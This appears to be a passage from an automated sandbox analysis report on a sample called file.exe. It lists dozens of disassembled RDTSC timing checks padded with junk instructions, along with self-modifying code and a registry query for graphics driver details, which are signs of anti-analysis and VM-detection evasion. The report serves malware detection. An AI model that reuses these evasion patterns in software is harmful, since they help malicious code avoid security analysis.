                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC7CD second address: 9AC7E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jns 00007F8FB8B0B4A6h 0x0000000e pushad 0x0000000f popad 0x00000010 js 00007F8FB8B0B4A6h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a pop eax 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC7E8 second address: 9AC806 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8FB915C646h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 jp 00007F8FB915C64Eh 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5129 second address: 9B514E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4B7h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F8FB8B0B4A6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B514E second address: 9B5152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5152 second address: 9B515E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B515E second address: 9B5162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B3F8B second address: 9B3F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B426B second address: 9B4273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B456E second address: 9B4584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F8FB8B0B4B0h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B4584 second address: 9B4588 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9A27 second address: 9B9A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD7E8 second address: 9BD818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F8FB915C654h 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007F8FB915C64Dh 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD818 second address: 9BD822 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8FB8B0B4A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD822 second address: 9BD83E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8FB915C658h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD83E second address: 9BD842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BCD4E second address: 9BCD5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 ja 00007F8FB915C646h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD516 second address: 9BD536 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8FB8B0B4A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8FB8B0B4B4h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9089AC second address: 9089B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9089B2 second address: 9089B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C4596 second address: 9C459C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C489B second address: 9C48A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C48A1 second address: 9C48A6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C4F4E second address: 9C4F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C4F55 second address: 9C4F67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8FB915C64Ch 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C4F67 second address: 9C4F6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C4F6B second address: 9C4F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8FB915C646h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C4F7B second address: 9C4F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C621F second address: 9C6225 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6225 second address: 9C6249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F8FB8B0B4AEh 0x0000000e jmp 00007F8FB8B0B4AEh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3F70 second address: 9C3F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3F74 second address: 9C3F78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3F78 second address: 9C3F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C8880 second address: 9C8886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C8886 second address: 9C8896 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a ja 00007F8FB915C646h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD989 second address: 9CD98E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD98E second address: 9CD9A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FB915C655h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD9A9 second address: 9CD9AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD9AF second address: 9CD9C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8FB915C64Dh 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CDB35 second address: 9CDB39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CDB39 second address: 9CDB3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CDB3D second address: 9CDB4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F8FB8B0B4A6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CDB4D second address: 9CDB5F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F8FB915C646h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CDB5F second address: 9CDB63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF40C second address: 9CF425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FB915C64Ch 0x00000009 popad 0x0000000a jng 00007F8FB915C652h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1750 second address: 9D1756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1756 second address: 9D175A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D175A second address: 9D175F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D175F second address: 9D176C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D176C second address: 9D1770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1770 second address: 9D1774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF9EE second address: 9DF9F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFB39 second address: 9DFB3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFB3E second address: 9DFB49 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007F8FB8B0B4A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFB49 second address: 9DFB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFB55 second address: 9DFB59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFB59 second address: 9DFB6B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8FB915C646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F8FB915C646h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFB6B second address: 9DFB75 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8FB8B0B4A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1FEA second address: 9E1FF4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8FB915C64Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1FF4 second address: 9E2005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F8FB8B0B4C0h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2005 second address: 9E200B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E4293 second address: 9E4297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E4297 second address: 9E429D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E429D second address: 9E42A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E42A3 second address: 9E42B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FB915C64Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E42B3 second address: 9E42C3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8FB8B0B4A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E42C3 second address: 9E42C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E42C7 second address: 9E42CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E42CB second address: 9E42F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8FB915C657h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E42F0 second address: 9E42FC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8FB8B0B4A6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E42FC second address: 9E4302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8B61 second address: 9E8B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8B66 second address: 9E8B6B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F811F second address: 9F8125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F8125 second address: 9F8129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F8858 second address: 9F885C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F89ED second address: 9F89F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F89F2 second address: 9F8A18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4AAh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8FB8B0B4B5h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC3F1 second address: 9FC40E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8FB915C655h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC40E second address: 9FC41A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8FB8B0B4A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC41A second address: 9FC420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC0F8 second address: 9FC111 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4B3h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC111 second address: 9FC11B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8FB915C646h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A04CED second address: A04CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A04CF3 second address: A04CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A08B05 second address: A08B09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1C0B8 second address: A1C0D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB915C64Bh 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1C0D3 second address: A1C0D9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1C0D9 second address: A1C0DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1BC8C second address: A1BC92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1BC92 second address: A1BC98 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1BC98 second address: A1BCA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1BDD3 second address: A1BDD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1BDD7 second address: A1BDDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A2C14B second address: A2C150 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A2C150 second address: A2C158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A2C978 second address: A2C97D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A2E75D second address: A2E783 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4ACh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007F8FB8B0B4AFh 0x00000011 pop esi 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A327DE second address: A327E4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A327E4 second address: A327FA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8FB8B0B4A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jbe 00007F8FB8B0B4AEh 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A329E4 second address: A329ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A32A56 second address: A32AAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8FB8B0B4B2h 0x0000000f nop 0x00000010 mov edx, dword ptr [ebp+122D3912h] 0x00000016 push 00000004h 0x00000018 mov dx, di 0x0000001b push B7B01F10h 0x00000020 push eax 0x00000021 push edx 0x00000022 ja 00007F8FB8B0B4B9h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A32AAE second address: A32AC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8FB915C64Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A32AC0 second address: A32AC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 94674C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 79F52A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 96ACBC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 7A1AD1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 9D6893 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
